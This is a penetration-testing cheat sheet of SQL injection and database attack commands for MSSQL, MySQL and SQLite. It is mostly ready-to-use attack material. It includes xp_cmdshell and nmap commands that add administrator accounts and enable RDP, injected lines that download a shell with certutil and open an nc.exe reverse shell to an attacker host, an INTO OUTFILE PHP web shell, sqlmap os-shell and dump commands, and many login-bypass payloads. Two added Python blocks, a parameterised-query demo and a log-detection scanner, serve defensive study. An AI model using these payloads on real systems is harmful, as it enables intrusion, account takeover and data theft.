1) MSSQL Injection Cheat Sheet | pentestmonkey
2) xp_cmdshell | Red Team tales
3) PentesterMonkey SQL Injection Cheatsheet
Use dbeaver for GUI Access
4) SQL Injection Explanation | Graceful Security
Common Ports
Microsoft SQL:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)
Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP
MongoDB:
27017,27018,27019/TCP
PostgreSQL:
8432/TCP
MySQL:
3306/TCP
SQL DB Enum with nmap:
nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433 IP_ADDRESS
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add"
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.10
MSSQL/MYSQL DB Login Bruteforce
git clone https://github.com/m8r0wn/enumdb.git
cd enumdb
python3 setup.py install
Download Wordlist from Seclists
cat mssql-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt
#Port is optional
#-t = mysql or mssql; mssql port 1433/1434; mysql port 3306
# -U = users.txt, -u = username; -P = passwords.txt, -p = password
enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v
SQSH usage:
sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'
\go
EXEC xp_cmdshell 'net localgroup administrators bhanu /add'
\go
MssqlClient
Exploiting From Windows with Explanation - Nikhil Mittal
#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)
mssqlclient.py username@10.10.10.10
#Run arbitrary commands
xp_cmdshell whoami
#View Version
SELECT @@version
#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();
#List Users
SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';
#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
#Enum Privs
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
#Show Servername
select @@servername
#Show linked servers
select * from sysservers;
select name from sysservers;
#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
#Check sysadmin accounts on the server/DB
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];
#Running command as a linked server using the server that we have permissions on
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#View the permissions you have on the linked database.
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#Creating a new sa user
#so that we can work directly on the DB we have permissions on, rather than nesting EXECUTE AT calls through the other server multiple times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
#Login as a new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123
#List Databases
SELECT name FROM master..sysdatabases;
#List Objects from a selected database
#Fully qualified object name in MSSQL: [server].[db].[schema].[table]
select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;
#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
#Abusing Xpdirtree
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1' /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
/This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
/union all is used to combine 2 or more select statements
/Wherever the output is displayed, that column is suitable for enumeration; here it is column 5
website.com/comment.php?id=738 union select 1,2,3,4,@@version,6 /mysql version command
website.com/comment.php?id=738 union select 1,2,3,4,user(),6 /Current user
website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
/Prints all of the table names in the database
website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
/Extract column names from the users table
website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users
ERROR BASED SQL Injection: SQLite
==================================
http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;
http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;
search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--; # Get all table names in sqlite_master db
search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--; #Get usernames and passwords
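The SQLite payloads above, and the "increase the column count until it errors" step in the MySQL section before them, both rely on the search term being pasted into the SQL text. The following Python script is an added example, not code from the original cheat sheet or from the application the payloads target: it builds an in-memory SQLite database with constructed Products and Users tables (placeholder password values, not real hashes), runs the same `x')) UNION ... --` shape against a search function that splices the term into the query, and then against the same query with a bound parameter. The ORDER BY probe reproduces the column-counting step on the same vulnerable function.

```python
import sqlite3

# Constructed sample data for the demo: a product search backed by a Products
# table, plus a Users table that an injected UNION can reach. Password values
# are placeholders, not real hashes.
PRODUCTS = [
    ("Apple Juice", "Fresh pressed", 1.99),
    ("Banana Juice", "Sweet and thick", 2.49),
]
USERS = [
    ("admin@example.test", "pw-hash-placeholder-1"),
    ("jim@example.test", "pw-hash-placeholder-2"),
]

# Same shape as the search?q=...')) payloads above: close the LIKE string and
# the two parentheses, append a UNION with the right column count, comment
# out the rest of the original query.
PAYLOAD = "x')) UNION SELECT 1, email, password, 4 FROM Users--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, "
                 "description TEXT, price REAL, deletedAt TEXT)")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO Products (name, description, price, deletedAt) "
                     "VALUES (?, ?, ?, NULL)", PRODUCTS)
    conn.executemany("INSERT INTO Users (email, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def search_vulnerable(conn, q):
    # The search term is spliced into the SQL text, so the quote and the
    # parentheses inside q are parsed as SQL, and everything after the
    # injected -- becomes a comment.
    sql = ("SELECT id, name, description, price FROM Products "
           f"WHERE ((name LIKE '%{q}%' OR description LIKE '%{q}%')) "
           "AND deletedAt IS NULL")
    return conn.execute(sql).fetchall()


def search_safe(conn, q):
    # Same query, but q travels as a bound parameter: the engine receives it
    # as a string value to compare against, never as SQL to parse.
    pattern = f"%{q}%"
    sql = ("SELECT id, name, description, price FROM Products "
           "WHERE ((name LIKE ? OR description LIKE ?)) AND deletedAt IS NULL")
    return conn.execute(sql, (pattern, pattern)).fetchall()


def probe_column_count(conn, max_cols=10):
    # The "ORDER BY n until it errors" step from the error-based section: the
    # largest n that does not raise is the column count a UNION has to match.
    count = 0
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(conn, f"x')) ORDER BY {n}--")
            count = n
        except sqlite3.OperationalError:
            break
    return count


def leaked_emails(rows):
    # The injected SELECT places email in the second result column.
    return sorted(r[1] for r in rows if isinstance(r[1], str) and "@" in r[1])


if __name__ == "__main__":
    conn = make_db()
    print("column count :", probe_column_count(conn))
    print("spliced query:", leaked_emails(search_vulnerable(conn, PAYLOAD)))
    print("bound param  :", search_safe(conn, PAYLOAD))
    print("normal search:", search_safe(conn, "juice"))
```

The point of running both functions on the same input is that the fix is not filtering the payload: `search_safe` still answers a normal search for "juice" with both products, and answers the payload with an empty result because no product name contains that literal string.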
TIME BASED SQL INJECTION:
--------------------------
In time-based SQL injection, if the injected condition is true the response is delayed by the sleep time;
otherwise it returns immediately.
website.com/comment.php?id=738-sleep(5) /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Responds after 5 seconds when the first character of @@version is '4' (condition true)
/Responds immediately when it is not (condition false)
website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
/Loading a file from the server
website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'
/Writes a PHP file into the web root with INTO OUTFILE
website.com/backdoor.php?cmd=ipconfig
SQL Command Injection: MSSQL
bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--
admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--
admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe';--
sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password
If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Creating an Admin Account with RDP Access:
aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--
aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--
aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';--
NSE Script for XP_CMDSHELL
Bypassing Restriction Interfaces:
----------------------------------
Use the Tamper Data Firefox plugin. /Intercepts POST requests
Start Tamper Data --> input something into the input field, or change the items in the drop-down.
SQLMAP:
---------
#Skip a parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param_Name
#Test only specified parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 -p Param1,Param2
#Dump all DB data
sqlmap -u http://website.com/comment.php?id=213 --dbms=mysql --dump --threads=5
#Get a shell
sqlmap -u http://website.com/comment.php?id=213 --dbms=mysql --os-shell
sqlmap --help
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
List all the databases:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --dbs
Current User:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-user
Current DB:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-db
Tables:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --tables -D owasp10
Columns:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10
Dump:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump
OS Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --os-shell
SQL Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --sql-shell
current_user()
user()
database()
select table_name from information_schema.tables where table_schema = 'owasp10'
Methodology
1) Check for login pages - try all special characters
2) F12 --> inspect the page; check for any search functionality such as search?q= or id=1, or similar parameters
Cheatsheet
admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--
USERNAME: ' or 1/*
PASSWORD: */ =1 --
USERNAME: admin' or 'a'='a
PASSWORD: '#
If the database is MySQL, try to dump all login info to files.
Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--
union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
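The payload list above, together with the xp_cmdshell and sp_configure statements in the MSSQL section earlier, is also what a defender wants to recognise in web server access logs and SQL Server audit records. The following Python is an added example, not code from the original post: it URL-decodes and normalises each line, then tags it by the technique the cheat sheet describes (tautology, UNION SELECT, comment terminator, time delay, file access, dangerous MSSQL procedure). The log lines are constructed for the demo, the access-log entry that carries a POST body is an assumed custom log format, and the regexes are narrow signatures meant to be read and tuned, not a complete filter.

```python
import re
from urllib.parse import unquote_plus

# Signatures in a fixed order so the tag list for a line is deterministic.
# Each one corresponds to a technique shown in the cheat sheet above.
SIGNATURES = [
    # ' or 1=1 / or true / admin' or '1'='1 style tautologies
    ("tautology", re.compile(
        r"""\bor\s+(?:true\b|\d+\s*=\s*\d+|(['"])[^'"]*\1\s*=\s*\1[^'"]*)""")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    # -- followed by whitespace/end of line, or a /* block comment opener
    ("sql_comment", re.compile(r"--(?:\s|$)|/\*")),
    ("time_based", re.compile(r"\b(?:sleep|benchmark)\s*\(|\bwaitfor\s+delay\b")),
    ("file_access", re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b")),
    # procedures the MSSQL section uses for command execution and privilege changes
    ("mssql_dangerous_proc", re.compile(
        r"\b(?:xp_cmdshell|xp_dirtree|sp_configure|sp_execute_external_script|sp_addsrvrolemember)\b")),
]

# Constructed sample lines: Apache-style access log entries (the POST line uses an
# assumed custom format that appends the request body) and SQL Server audit-style
# records. None of these are real captures.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /comment.php?id=738 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /comment.php?id=738%20union%20select%201,2,3,4,%40%40version,6 HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /comment.php?id=738-IF(MID(%40%40version,1,1)%3D%274%27,SLEEP(5),0) HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "POST /login.php HTTP/1.1" 302 0 "username=admin%27+or+%271%27%3D%271&password=x"',
    '10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /comment.php?id=738%20union%20all%20select%201,2,3,4,load_file(%22c:/windows/system32/drivers/etc/hosts%22),6 HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:00:18 +0000] "GET /rest/products/search?q=x%27))%20union%20select%20sql,2,3,4,5,6,7,8,9%20from%20sqlite_master-- HTTP/1.1" 200 1200',
    'MSSQL-AUDIT 2024-01-01T10:01:00Z login=webapp statement="EXEC master..xp_cmdshell \'whoami\'"',
    'MSSQL-AUDIT 2024-01-01T10:01:02Z login=webapp statement="EXEC sp_configure \'xp_cmdshell\', 1; RECONFIGURE;"',
    'MSSQL-AUDIT 2024-01-01T10:01:05Z login=webapp statement="SELECT name FROM master..sysdatabases"',
]


def normalize(line):
    # Decode twice so %27, + and double-encoded forms like %2527 all end up as the
    # literal characters the database would see, then lower-case and collapse
    # whitespace so the patterns above can stay simple.
    decoded = unquote_plus(unquote_plus(line))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(line):
    # Return every technique tag whose signature matches the normalised line.
    text = normalize(line)
    return [tag for tag, pattern in SIGNATURES if pattern.search(text)]


def scan(lines):
    # (1-based line number, tags) for each line that triggered at least one signature.
    hits = []
    for number, line in enumerate(lines, start=1):
        tags = classify(line)
        if tags:
            hits.append((number, tags))
    return hits


if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOGS):
        print(f"line {number}: {', '.join(tags)}")
```

Decoding before matching is the part that matters most: the tautology in the login line only becomes visible once `%27` and `+` are turned back into the quote and space the database received, and the two benign lines (a plain `id=738` request and a `SELECT name FROM master..sysdatabases` audit record) produce no tags at all.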